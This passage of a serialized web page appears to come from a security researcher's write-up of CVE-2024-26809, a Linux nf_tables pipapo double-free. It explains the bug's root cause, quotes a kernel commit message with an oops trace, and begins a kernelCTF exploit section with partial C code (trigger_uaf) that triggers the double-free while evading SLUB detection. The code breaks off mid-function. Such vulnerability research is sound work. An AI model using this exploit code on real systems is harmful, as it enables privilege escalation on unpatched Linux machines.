",{"type":24,"tag":145,"props":60435,"children":60437},{"className":60436},[],[60438],{"type":30,"value":57703},{"type":30,"value":60440}," true in the release step because the ",{"type":24,"tag":145,"props":60442,"children":60444},{"className":60443},[],[60445],{"type":30,"value":59070},{"type":30,"value":60447}," method is always invoked first...\nHowever, one last piece brings this bug to life: the ",{"type":24,"tag":145,"props":60449,"children":60451},{"className":60450},[],[60452],{"type":30,"value":60453},"set->dead",{"type":30,"value":60455}," flag. If a ",{"type":24,"tag":145,"props":60457,"children":60459},{"className":60458},[],[60460],{"type":30,"value":57749},{"type":30,"value":60462}," was marked for deletion, it receives the ",{"type":24,"tag":145,"props":60464,"children":60466},{"className":60465},[],[60467],{"type":30,"value":60453},{"type":30,"value":60469}," flag ",{"type":24,"tag":301,"props":60471,"children":60472},{},[60473],{"type":30,"value":1503},{"type":30,"value":60475},". If this flag is set, then the commit path will skip any commitments to this ",{"type":24,"tag":145,"props":60477,"children":60479},{"className":60478},[],[60480],{"type":30,"value":57749},{"type":30,"value":13277},{"type":24,"tag":301,"props":60483,"children":60484},{},[60485],{"type":30,"value":1761},{"type":30,"value":60487},". This is extremely convenient for us and will allow us to trigger the double-free because the ",{"type":24,"tag":145,"props":60489,"children":60491},{"className":60490},[],[60492],{"type":30,"value":60493},"priv ->dirty",{"type":30,"value":60495}," flag is not cleared when it should have been.",{"type":24,"tag":43,"props":60497,"children":60499},{"id":60498},"tracing-the-guilty-commit",[60500],{"type":30,"value":60501},"Tracing the guilty commit",{"type":24,"tag":32,"props":60503,"children":60504},{},[60505,60507,60514,60516,60522,60524,60529,60531,60537],{"type":30,"value":60506},"The above scenario raises some interesting suppositions about how this vulnerability was introduced. See, any ",{"type":24,"tag":188,"props":60508,"children":60511},{"href":60509,"rel":60510},"https://ubuntu.com/security/CVE-2024-26809",[192],[60512],{"type":30,"value":60513},"advisories",{"type":30,"value":60515}," about this vulnerability will say it was introduced by this ",{"type":24,"tag":188,"props":60517,"children":60520},{"href":60518,"rel":60519},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",[192],[60521],{"type":30,"value":59403},{"type":30,"value":60523},", which sounds fair considering this added the weird code that frees twice in the same path. However, by checking the blame on the ",{"type":24,"tag":145,"props":60525,"children":60527},{"className":60526},[],[60528],{"type":30,"value":60453},{"type":30,"value":60530}," flag, which was what actually made this exploitable, we will learn that it was only introduced over a year after the commit above in this ",{"type":24,"tag":188,"props":60532,"children":60535},{"href":60533,"rel":60534},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26",[192],[60536],{"type":30,"value":59403},{"type":30,"value":206},{"type":24,"tag":32,"props":60539,"children":60540},{},[60541],{"type":30,"value":60542},"By reading the message of the first commit, we can finally understand why this code was added:",{"type":24,"tag":291,"props":60544,"children":60548},{"className":60545,"code":60546,"language":60547,"meta":7,"style":7},"language-txt shiki shiki-themes slack-dark","New elements that reside in the clone are not released in case that the\ntransaction is aborted.\n\n[16302.231754] ------------[ cut here ]------------\n[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[...]\n[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G W 5.19.0-rc3+ #155\n[...]\n[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n[...]\n[16302.231917] Call Trace:\n[16302.231919] \u003CTASK>\n[16302.231921] __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n[16302.231934] nf_tables_abort+0x30/0x50 [nf_tables]\n[16302.231946] nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n[16302.231952] ? __nla_validate_parse+0x48/0x190\n[16302.231959] nfnetlink_rcv+0x110/0x129 [nfnetlink]\n[16302.231963] netlink_unicast+0x211/0x340\n[16302.231969] netlink_sendmsg+0x21e/0x460\n\nAdd nft_set_pipapo_match_destroy() helper function to release the\nelements in the lookup tables.\n\nStefano Brivio says: \"We additionally look for elements pointers in the\ncloned matching data if priv->dirty is set, because that means that\ncloned data might point to additional elements we did not commit to the\nworking copy yet (such as the abort path case, but perhaps not limited\nto it).\"\n\nFixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\nReviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\nSigned-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n","txt",[60549],{"type":24,"tag":145,"props":60550,"children":60551},{"__ignoreMap":7},[60552,60560,60568,60575,60583,60591,60598,60606,60613,60621,60629,60636,60644,60652,60660,60668,60676,60684,60692,60700,60708,60715,60723,60731,60738,60746,60754,60762,60770,60778,60785,60793,60801],{"type":24,"tag":301,"props":60553,"children":60554},{"class":303,"line":304},[60555],{"type":24,"tag":301,"props":60556,"children":60557},{},[60558],{"type":30,"value":60559},"New elements that reside in the clone are not released in case that the\n",{"type":24,"tag":301,"props":60561,"children":60562},{"class":303,"line":320},[60563],{"type":24,"tag":301,"props":60564,"children":60565},{},[60566],{"type":30,"value":60567},"transaction is aborted.\n",{"type":24,"tag":301,"props":60569,"children":60570},{"class":303,"line":335},[60571],{"type":24,"tag":301,"props":60572,"children":60573},{"emptyLinePlaceholder":16},[60574],{"type":30,"value":341},{"type":24,"tag":301,"props":60576,"children":60577},{"class":303,"line":344},[60578],{"type":24,"tag":301,"props":60579,"children":60580},{},[60581],{"type":30,"value":60582},"[16302.231754] ------------[ cut here ]------------\n",{"type":24,"tag":301,"props":60584,"children":60585},{"class":303,"line":401},[60586],{"type":24,"tag":301,"props":60587,"children":60588},{},[60589],{"type":30,"value":60590},"[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":24,"tag":301,"props":60592,"children":60593},{"class":303,"line":415},[60594],{"type":24,"tag":301,"props":60595,"children":60596},{},[60597],{"type":30,"value":17123},{"type":24,"tag":301,"props":60599,"children":60600},{"class":303,"line":439},[60601],{"type":24,"tag":301,"props":60602,"children":60603},{},[60604],{"type":30,"value":60605},"[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G W 5.19.0-rc3+ #155\n",{"type":24,"tag":301,"props":60607,"children":60608},{"class":303,"line":447},[60609],{"type":24,"tag":301,"props":60610,"children":60611},{},[60612],{"type":30,"value":17123},{"type":24,"tag":301,"props":60614,"children":60615},{"class":303,"line":476},[60616],{"type":24,"tag":301,"props":60617,"children":60618},{},[60619],{"type":30,"value":60620},"[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":24,"tag":301,"props":60622,"children":60623},{"class":303,"line":495},[60624],{"type":24,"tag":301,"props":60625,"children":60626},{},[60627],{"type":30,"value":60628},"[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n",{"type":24,"tag":301,"props":60630,"children":60631},{"class":303,"line":504},[60632],{"type":24,"tag":301,"props":60633,"children":60634},{},[60635],{"type":30,"value":17123},{"type":24,"tag":301,"props":60637,"children":60638},{"class":303,"line":512},[60639],{"type":24,"tag":301,"props":60640,"children":60641},{},[60642],{"type":30,"value":60643},"[16302.231917] Call Trace:\n",{"type":24,"tag":301,"props":60645,"children":60646},{"class":303,"line":592},[60647],{"type":24,"tag":301,"props":60648,"children":60649},{},[60650],{"type":30,"value":60651},"[16302.231919] \u003CTASK>\n",{"type":24,"tag":301,"props":60653,"children":60654},{"class":303,"line":619},[60655],{"type":24,"tag":301,"props":60656,"children":60657},{},[60658],{"type":30,"value":60659},"[16302.231921] __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n",{"type":24,"tag":301,"props":60661,"children":60662},{"class":303,"line":635},[60663],{"type":24,"tag":301,"props":60664,"children":60665},{},[60666],{"type":30,"value":60667},"[16302.231934] nf_tables_abort+0x30/0x50 [nf_tables]\n",{"type":24,"tag":301,"props":60669,"children":60670},{"class":303,"line":643},[60671],{"type":24,"tag":301,"props":60672,"children":60673},{},[60674],{"type":30,"value":60675},"[16302.231946] nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n",{"type":24,"tag":301,"props":60677,"children":60678},{"class":303,"line":652},[60679],{"type":24,"tag":301,"props":60680,"children":60681},{},[60682],{"type":30,"value":60683},"[16302.231952] ? __nla_validate_parse+0x48/0x190\n",{"type":24,"tag":301,"props":60685,"children":60686},{"class":303,"line":666},[60687],{"type":24,"tag":301,"props":60688,"children":60689},{},[60690],{"type":30,"value":60691},"[16302.231959] nfnetlink_rcv+0x110/0x129 [nfnetlink]\n",{"type":24,"tag":301,"props":60693,"children":60694},{"class":303,"line":674},[60695],{"type":24,"tag":301,"props":60696,"children":60697},{},[60698],{"type":30,"value":60699},"[16302.231963] netlink_unicast+0x211/0x340\n",{"type":24,"tag":301,"props":60701,"children":60702},{"class":303,"line":692},[60703],{"type":24,"tag":301,"props":60704,"children":60705},{},[60706],{"type":30,"value":60707},"[16302.231969] netlink_sendmsg+0x21e/0x460\n",{"type":24,"tag":301,"props":60709,"children":60710},{"class":303,"line":3631},[60711],{"type":24,"tag":301,"props":60712,"children":60713},{"emptyLinePlaceholder":16},[60714],{"type":30,"value":341},{"type":24,"tag":301,"props":60716,"children":60717},{"class":303,"line":3639},[60718],{"type":24,"tag":301,"props":60719,"children":60720},{},[60721],{"type":30,"value":60722},"Add nft_set_pipapo_match_destroy() helper function to release the\n",{"type":24,"tag":301,"props":60724,"children":60725},{"class":303,"line":3647},[60726],{"type":24,"tag":301,"props":60727,"children":60728},{},[60729],{"type":30,"value":60730},"elements in the lookup tables.\n",{"type":24,"tag":301,"props":60732,"children":60733},{"class":303,"line":3685},[60734],{"type":24,"tag":301,"props":60735,"children":60736},{"emptyLinePlaceholder":16},[60737],{"type":30,"value":341},{"type":24,"tag":301,"props":60739,"children":60740},{"class":303,"line":3713},[60741],{"type":24,"tag":301,"props":60742,"children":60743},{},[60744],{"type":30,"value":60745},"Stefano Brivio says: \"We additionally look for elements pointers in the\n",{"type":24,"tag":301,"props":60747,"children":60748},{"class":303,"line":3721},[60749],{"type":24,"tag":301,"props":60750,"children":60751},{},[60752],{"type":30,"value":60753},"cloned matching data if priv->dirty is set, because that means that\n",{"type":24,"tag":301,"props":60755,"children":60756},{"class":303,"line":3751},[60757],{"type":24,"tag":301,"props":60758,"children":60759},{},[60760],{"type":30,"value":60761},"cloned data might point to additional elements we did not commit to the\n",{"type":24,"tag":301,"props":60763,"children":60764},{"class":303,"line":3782},[60765],{"type":24,"tag":301,"props":60766,"children":60767},{},[60768],{"type":30,"value":60769},"working copy yet (such as the abort path case, but perhaps not limited\n",{"type":24,"tag":301,"props":60771,"children":60772},{"class":303,"line":3791},[60773],{"type":24,"tag":301,"props":60774,"children":60775},{},[60776],{"type":30,"value":60777},"to it).\"\n",{"type":24,"tag":301,"props":60779,"children":60780},{"class":303,"line":3819},[60781],{"type":24,"tag":301,"props":60782,"children":60783},{"emptyLinePlaceholder":16},[60784],{"type":30,"value":341},{"type":24,"tag":301,"props":60786,"children":60787},{"class":303,"line":4397},[60788],{"type":24,"tag":301,"props":60789,"children":60790},{},[60791],{"type":30,"value":60792},"Fixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\n",{"type":24,"tag":301,"props":60794,"children":60795},{"class":303,"line":4405},[60796],{"type":24,"tag":301,"props":60797,"children":60798},{},[60799],{"type":30,"value":60800},"Reviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\n",{"type":24,"tag":301,"props":60802,"children":60803},{"class":303,"line":4422},[60804],{"type":24,"tag":301,"props":60805,"children":60806},{},[60807],{"type":30,"value":60808},"Signed-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n",{"type":24,"tag":32,"props":60810,"children":60811},{},[60812,60814,60819,60821,60826,60828,60833,60835,60840],{"type":30,"value":60813},"As we previously discussed, committing changes to a pipapo ",{"type":24,"tag":145,"props":60815,"children":60817},{"className":60816},[],[60818],{"type":30,"value":57749},{"type":30,"value":60820}," is implemented by creating a clone of the match object, to which changes are made during the control plane. Later, if we enter the commit path, the changes are committed in the ",{"type":24,"tag":145,"props":60822,"children":60824},{"className":60823},[],[60825],{"type":30,"value":59070},{"type":30,"value":60827}," method by simply replacing the ",{"type":24,"tag":145,"props":60829,"children":60831},{"className":60830},[],[60832],{"type":30,"value":57749},{"type":30,"value":60834},"s match object with its updated clone. So checking the ",{"type":24,"tag":145,"props":60836,"children":60838},{"className":60837},[],[60839],{"type":30,"value":57703},{"type":30,"value":60841}," flag and then calling free again ensures we also free uncommitted changes.",{"type":24,"tag":32,"props":60843,"children":60844},{},[60845,60847,60852],{"type":30,"value":60846},"This doesn't make sense in the commit path but only in the abort path. Evidently, when aborting the transaction that creates the ",{"type":24,"tag":145,"props":60848,"children":60850},{"className":60849},[],[60851],{"type":30,"value":57749},{"type":30,"value":60853},", there will be no committed changes, and there will only be the elements inside the clone, which will end up never being committed. So, to make sure we free these uncommitted elements, it's crucial to free what's in the clone.",{"type":24,"tag":32,"props":60855,"children":60856},{},[60857,60859,60865,60867,60872,60874,60879],{"type":30,"value":60858},"When this code was introduced, it was only reachable from the abort path because it was the only path where ",{"type":24,"tag":145,"props":60860,"children":60862},{"className":60861},[],[60863],{"type":30,"value":60864},"set->ops->destroy()",{"type":30,"value":60866}," could be called without clearing the ",{"type":24,"tag":145,"props":60868,"children":60870},{"className":60869},[],[60871],{"type":30,"value":57703},{"type":30,"value":60873}," flag, which was fine considering you didn't have duplicated views of the ",{"type":24,"tag":145,"props":60875,"children":60877},{"className":60876},[],[60878],{"type":30,"value":57741},{"type":30,"value":60880},"s, so they would all be in the clone set.",{"type":24,"tag":32,"props":60882,"children":60883},{},[60884,60886,60891],{"type":30,"value":60885},"But when the ",{"type":24,"tag":145,"props":60887,"children":60889},{"className":60888},[],[60890],{"type":30,"value":60453},{"type":30,"value":60892}," flag was introduced, some assumptions about the commit path were changed. It created a new way of reaching this code while having already committed changes in the set. This means any already committed changes will have a view in the \"normal\" match object and one in the clone.",{"type":24,"tag":32,"props":60894,"children":60895},{},[60896],{"type":30,"value":60897},"The vulnerability was fixed by only deleting elements from the clone because the clone should have all views of committed and uncommitted changes, effectively eliminating the double-free vulnerability.",{"type":24,"tag":43,"props":60899,"children":60901},{"id":60900},"kernelctf-exploit",[60902],{"type":30,"value":60903},"KernelCTF exploit",{"type":24,"tag":32,"props":60905,"children":60906},{},[60907,60909,60915,60917,60924],{"type":30,"value":60908},"Now that we know the full story of the bug, let's look into how I exploited it in the KernelCTF LTS instance before getting into the universal exploit. A great deal of the exploit is based on the ",{"type":24,"tag":145,"props":60910,"children":60912},{"className":60911},[],[60913],{"type":30,"value":60914},"nft_object + udata",{"type":30,"value":60916}," technique shared by lonial con in a ",{"type":24,"tag":188,"props":60918,"children":60921},{"href":60919,"rel":60920},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md",[192],[60922],{"type":30,"value":60923},"previous kernelCTF exploit",{"type":30,"value":206},{"type":24,"tag":80,"props":60926,"children":60928},{"id":60927},"trigger-uafavoid-double-free-detection",[60929],{"type":30,"value":60930},"Trigger UAF/avoid double-free detection",{"type":24,"tag":32,"props":60932,"children":60933},{},[60934,60936,60942,60944,60950],{"type":30,"value":60935},"The SLUB allocator has a naive double-free detection mechanism to spot straightforward sequences, such as the same object being added to the free-list twice in a row without any other objects being added in between.\nAs we have seen, ",{"type":24,"tag":145,"props":60937,"children":60939},{"className":60938},[],[60940],{"type":30,"value":60941},"nft_set_pipapo_match_destroy",{"type":30,"value":60943}," iterates over the ",{"type":24,"tag":145,"props":60945,"children":60947},{"className":60946},[],[60948],{"type":30,"value":60949},"setelems",{"type":30,"value":60951}," in the set and frees each of them, so it should be relatively simple to avoid detection by having more than one element in the set, in which case the following will happen:",{"type":24,"tag":6246,"props":60953,"children":60954},{},[60955,60960,60965,60970],{"type":24,"tag":2659,"props":60956,"children":60957},{},[60958],{"type":30,"value":60959},"Element A gets freed",{"type":24,"tag":2659,"props":60961,"children":60962},{},[60963],{"type":30,"value":60964},"Element B gets free",{"type":24,"tag":2659,"props":60966,"children":60967},{},[60968],{"type":30,"value":60969},"Element A gets freed again (double-free)",{"type":24,"tag":2659,"props":60971,"children":60972},{},[60973],{"type":30,"value":60974},"Element B gets freed again (double-free)",{"type":24,"tag":291,"props":60976,"children":60978},{"className":35866,"code":60977,"language":35868,"meta":7,"style":7},"[...]\nstatic void trigger_uaf(struct mnl_socket *nl, size_t size, int *msgqids)\n{\n[...]\n // TRANSACTION 2\n[...]\n\n // create pipapo set\n uint8_t desc[2] = {16, 16};\n set = create_set(\n batch, seq++, exploit_table_name, \"pwn_set\", 0x1337,\n NFT_SET_INTERVAL | NFT_SET_OBJECT | NFT_SET_CONCAT, KEY_LEN, 2, &desc, NULL, 0, NFT_OBJECT_CT_EXPECT);\n\n // commit 2 elems to set (elems A and B that will be double-freed)\n for (int i = 0; i \u003C 2; i++)\n {\n elem[i] = nftnl_set_elem_alloc();\n memset(key, 0x41 + i, KEY_LEN);\n nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_USERDATA, &udata_buf, size);\n nftnl_set_elem_add(set, elem[i]);\n }\n[...]\n\n // TRANSACTION 3\n[...]\n set = nftnl_set_alloc();\n nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);\n nftnl_set_set_str(set, NFTNL_SET_TABLE, exploit_table_name);\n nftnl_set_set_str(set, NFTNL_SET_NAME, \"pwn_set\");\n\n // make priv->dirty true\n memset(key, 0xff, KEY_LEN);\n elem[3] = nftnl_set_elem_alloc();\n nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n nftnl_set_elem_add(set, elem[3]);\n[...]\n\n // double-free commited elems\n[...]\n nftnl_set_free(set);\n}\n[...]\n",[60979],{"type":24,"tag":145,"props":60980,"children":60981},{"__ignoreMap":7},[60982,60989,61050,61057,61064,61072,61079,61086,61094,61118,61139,61173,61233,61240,61248,61299,61306,61332,61359,61398,61427,61456,61478,61485,61492,61499,61507,61514,61522,61535,61548,61568,61575,61583,61605,61637,61682,61718,61746,61753,61760,61768,61775,61791,61798],{"type":24,"tag":301,"props":60983,"children":60984},{"class":303,"line":304},[60985],{"type":24,"tag":301,"props":60986,"children":60987},{"style":359},[60988],{"type":30,"value":17123},{"type":24,"tag":301,"props":60990,"children":60991},{"class":303,"line":320},[60992,60997,61001,61006,61010,61015,61019,61024,61029,61033,61037,61041,61046],{"type":24,"tag":301,"props":60993,"children":60994},{"style":359},[60995],{"type":30,"value":60996},"static void trigger_uaf(",{"type":24,"tag":301,"props":60998,"children":60999},{"style":348},[61000],{"type":30,"value":3010},{"type":24,"tag":301,"props":61002,"children":61003},{"style":10246},[61004],{"type":30,"value":61005}," mnl_socket",{"type":24,"tag":301,"props":61007,"children":61008},{"style":348},[61009],{"type":30,"value":431},{"type":24,"tag":301,"props":61011,"children":61012},{"style":369},[61013],{"type":30,"value":61014},"nl",{"type":24,"tag":301,"props":61016,"children":61017},{"style":359},[61018],{"type":30,"value":377},{"type":24,"tag":301,"props":61020,"children":61021},{"style":348},[61022],{"type":30,"value":61023},"size_t",{"type":24,"tag":301,"props":61025,"children":61026},{"style":369},[61027],{"type":30,"value":61028}," size",{"type":24,"tag":301,"props":61030,"children":61031},{"style":359},[61032],{"type":30,"value":377},{"type":24,"tag":301,"props":61034,"children":61035},{"style":348},[61036],{"type":30,"value":351},{"type":24,"tag":301,"props":61038,"children":61039},{"style":348},[61040],{"type":30,"value":431},{"type":24,"tag":301,"props":61042,"children":61043},{"style":369},[61044],{"type":30,"value":61045},"msgqids",{"type":24,"tag":301,"props":61047,"children":61048},{"style":359},[61049],{"type":30,"value":791},{"type":24,"tag":301,"props":61051,"children":61052},{"class":303,"line":335},[61053],{"type":24,"tag":301,"props":61054,"children":61055},{"style":359},[61056],{"type":30,"value":799},{"type":24,"tag":301,"props":61058,"children":61059},{"class":303,"line":344},[61060],{"type":24,"tag":301,"props":61061,"children":61062},{"style":359},[61063],{"type":30,"value":17123},{"type":24,"tag":301,"props":61065,"children":61066},{"class":303,"line":401},[61067],{"type":24,"tag":301,"props":61068,"children":61069},{"style":359},[61070],{"type":30,"value":61071}," // TRANSACTION 2\n",{"type":24,"tag":301,"props":61073,"children":61074},{"class":303,"line":415},[61075],{"type":24,"tag":301,"props":61076,"children":61077},{"style":359},[61078],{"type":30,"value":17123},{"type":24,"tag":301,"props":61080,"children":61081},{"class":303,"line":439},[61082],{"type":24,"tag":301,"props":61083,"children":61084},{"emptyLinePlaceholder":16},[61085],{"type":30,"value":341},{"type":24,"tag":301,"props":61087,"children":61088},{"class":303,"line":447},[61089],{"type":24,"tag":301,"props":61090,"children":61091},{"style":359},[61092],{"type":30,"value":61093}," // create pipapo set\n",{"type":24,"tag":301,"props":61095,"children":61096},{"class":303,"line":476},[61097,61102,61106,61110,61114],{"type":24,"tag":301,"props":61098,"children":61099},{"style":359},[61100],{"type":30,"value":61101}," uint8_t desc[2] = {",{"type":24,"tag":301,"props":61103,"children":61104},{"style":466},[61105],{"type":30,"value":3073},{"type":24,"tag":301,"props":61107,"children":61108},{"style":359},[61109],{"type":30,"value":377},{"type":24,"tag":301,"props":61111,"children":61112},{"style":466},[61113],{"type":30,"value":3073},{"type":24,"tag":301,"props":61115,"children":61116},{"style":359},[61117],{"type":30,"value":3118},{"type":24,"tag":301,"props":61119,"children":61120},{"class":303,"line":495},[61121,61126,61130,61135],{"type":24,"tag":301,"props":61122,"children":61123},{"style":359},[61124],{"type":30,"value":61125}," set ",{"type":24,"tag":301,"props":61127,"children":61128},{"style":385},[61129],{"type":30,"value":523},{"type":24,"tag":301,"props":61131,"children":61132},{"style":314},[61133],{"type":30,"value":61134}," create_set",{"type":24,"tag":301,"props":61136,"children":61137},{"style":359},[61138],{"type":30,"value":1707},{"type":24,"tag":301,"props":61140,"children":61141},{"class":303,"line":504},[61142,61147,61151,61156,61161,61165,61169],{"type":24,"tag":301,"props":61143,"children":61144},{"style":359},[61145],{"type":30,"value":61146}," batch, seq",{"type":24,"tag":301,"props":61148,"children":61149},{"style":385},[61150],{"type":30,"value":1859},{"type":24,"tag":301,"props":61152,"children":61153},{"style":359},[61154],{"type":30,"value":61155},", exploit_table_name, ",{"type":24,"tag":301,"props":61157,"children":61158},{"style":329},[61159],{"type":30,"value":61160},"\"pwn_set\"",{"type":24,"tag":301,"props":61162,"children":61163},{"style":359},[61164],{"type":30,"value":377},{"type":24,"tag":301,"props":61166,"children":61167},{"style":466},[61168],{"type":30,"value":8221},{"type":24,"tag":301,"props":61170,"children":61171},{"style":359},[61172],{"type":30,"value":1729},{"type":24,"tag":301,"props":61174,"children":61175},{"class":303,"line":512},[61176,61181,61185,61190,61194,61199,61203,61207,61211,61216,61220,61224,61228],{"type":24,"tag":301,"props":61177,"children":61178},{"style":359},[61179],{"type":30,"value":61180}," NFT_SET_INTERVAL ",{"type":24,"tag":301,"props":61182,"children":61183},{"style":385},[61184],{"type":30,"value":17220},{"type":24,"tag":301,"props":61186,"children":61187},{"style":359},[61188],{"type":30,"value":61189}," NFT_SET_OBJECT ",{"type":24,"tag":301,"props":61191,"children":61192},{"style":385},[61193],{"type":30,"value":17220},{"type":24,"tag":301,"props":61195,"children":61196},{"style":359},[61197],{"type":30,"value":61198}," NFT_SET_CONCAT, KEY_LEN, ",{"type":24,"tag":301,"props":61200,"children":61201},{"style":466},[61202],{"type":30,"value":1503},{"type":24,"tag":301,"props":61204,"children":61205},{"style":359},[61206],{"type":30,"value":377},{"type":24,"tag":301,"props":61208,"children":61209},{"style":385},[61210],{"type":30,"value":556},{"type":24,"tag":301,"props":61212,"children":61213},{"style":359},[61214],{"type":30,"value":61215},"desc, ",{"type":24,"tag":301,"props":61217,"children":61218},{"style":348},[61219],{"type":30,"value":8855},{"type":24,"tag":301,"props":61221,"children":61222},{"style":359},[61223],{"type":30,"value":377},{"type":24,"tag":301,"props":61225,"children":61226},{"style":466},[61227],{"type":30,"value":584},{"type":24,"tag":301,"props":61229,"children":61230},{"style":359},[61231],{"type":30,"value":61232},", NFT_OBJECT_CT_EXPECT);\n",{"type":24,"tag":301,"props":61234,"children":61235},{"class":303,"line":592},[61236],{"type":24,"tag":301,"props":61237,"children":61238},{"emptyLinePlaceholder":16},[61239],{"type":30,"value":341},{"type":24,"tag":301,"props":61241,"children":61242},{"class":303,"line":619},[61243],{"type":24,"tag":301,"props":61244,"children":61245},{"style":1062},[61246],{"type":30,"value":61247}," // commit 2 elems to set (elems A and B that will be double-freed)\n",{"type":24,"tag":301,"props":61249,"children":61250},{"class":303,"line":635},[61251,61255,61259,61263,61267,61271,61275,61279,61283,61287,61291,61295],{"type":24,"tag":301,"props":61252,"children":61253},{"style":308},[61254],{"type":30,"value":3249},{"type":24,"tag":301,"props":61256,"children":61257},{"style":359},[61258],{"type":30,"value":873},{"type":24,"tag":301,"props":61260,"children":61261},{"style":348},[61262],{"type":30,"value":351},{"type":24,"tag":301,"props":61264,"children":61265},{"style":359},[61266],{"type":30,"value":1998},{"type":24,"tag":301,"props":61268,"children":61269},{"style":385},[61270],{"type":30,"value":523},{"type":24,"tag":301,"props":61272,"children":61273},{"style":466},[61274],{"type":30,"value":685},{"type":24,"tag":301,"props":61276,"children":61277},{"style":359},[61278],{"type":30,"value":1844},{"type":24,"tag":301,"props":61280,"children":61281},{"style":385},[61282],{"type":30,"value":1849},{"type":24,"tag":301,"props":61284,"children":61285},{"style":466},[61286],{"type":30,"value":469},{"type":24,"tag":301,"props":61288,"children":61289},{"style":359},[61290],{"type":30,"value":57990},{"type":24,"tag":301,"props":61292,"children":61293},{"style":385},[61294],{"type":30,"value":1859},{"type":24,"tag":301,"props":61296,"children":61297},{"style":359},[61298],{"type":30,"value":791},{"type":24,"tag":301,"props":61300,"children":61301},{"class":303,"line":643},[61302],{"type":24,"tag":301,"props":61303,"children":61304},{"style":359},[61305],{"type":30,"value":35943},{"type":24,"tag":301,"props":61307,"children":61308},{"class":303,"line":652},[61309,61314,61319,61323,61328],{"type":24,"tag":301,"props":61310,"children":61311},{"style":369},[61312],{"type":30,"value":61313}," elem",{"type":24,"tag":301,"props":61315,"children":61316},{"style":359},[61317],{"type":30,"value":61318},"[i] ",{"type":24,"tag":301,"props":61320,"children":61321},{"style":385},[61322],{"type":30,"value":523},{"type":24,"tag":301,"props":61324,"children":61325},{"style":314},[61326],{"type":30,"value":61327}," nftnl_set_elem_alloc",{"type":24,"tag":301,"props":61329,"children":61330},{"style":359},[61331],{"type":30,"value":4859},{"type":24,"tag":301,"props":61333,"children":61334},{"class":303,"line":666},[61335,61340,61345,61350,61354],{"type":24,"tag":301,"props":61336,"children":61337},{"style":314},[61338],{"type":30,"value":61339}," memset",{"type":24,"tag":301,"props":61341,"children":61342},{"style":359},[61343],{"type":30,"value":61344},"(key, ",{"type":24,"tag":301,"props":61346,"children":61347},{"style":466},[61348],{"type":30,"value":61349},"0x41",{"type":24,"tag":301,"props":61351,"children":61352},{"style":385},[61353],{"type":30,"value":957},{"type":24,"tag":301,"props":61355,"children":61356},{"style":359},[61357],{"type":30,"value":61358}," i, KEY_LEN);\n",{"type":24,"tag":301,"props":61360,"children":61361},{"class":303,"line":674},[61362,61367,61371,61375,61380,61385,61389,61394],{"type":24,"tag":301,"props":61363,"children":61364},{"style":314},[61365],{"type":30,"value":61366}," nftnl_set_elem_set",{"type":24,"tag":301,"props":61368,"children":61369},{"style":359},[61370],{"type":30,"value":362},{"type":24,"tag":301,"props":61372,"children":61373},{"style":369},[61374],{"type":30,"value":58789},{"type":24,"tag":301,"props":61376,"children":61377},{"style":359},[61378],{"type":30,"value":61379},"[i], NFTNL_SET_ELEM_OBJREF, ",{"type":24,"tag":301,"props":61381,"children":61382},{"style":329},[61383],{"type":30,"value":61384},"\"pwnobj\"",{"type":24,"tag":301,"props":61386,"children":61387},{"style":359},[61388],{"type":30,"value":377},{"type":24,"tag":301,"props":61390,"children":61391},{"style":466},[61392],{"type":30,"value":61393},"7",{"type":24,"tag":301,"props":61395,"children":61396},{"style":359},[61397],{"type":30,"value":589},{"type":24,"tag":301,"props":61399,"children":61400},{"class":303,"line":692},[61401,61405,61409,61413,61418,61422],{"type":24,"tag":301,"props":61402,"children":61403},{"style":314},[61404],{"type":30,"value":61366},{"type":24,"tag":301,"props":61406,"children":61407},{"style":359},[61408],{"type":30,"value":362},{"type":24,"tag":301,"props":61410,"children":61411},{"style":369},[61412],{"type":30,"value":58789},{"type":24,"tag":301,"props":61414,"children":61415},{"style":359},[61416],{"type":30,"value":61417},"[i], 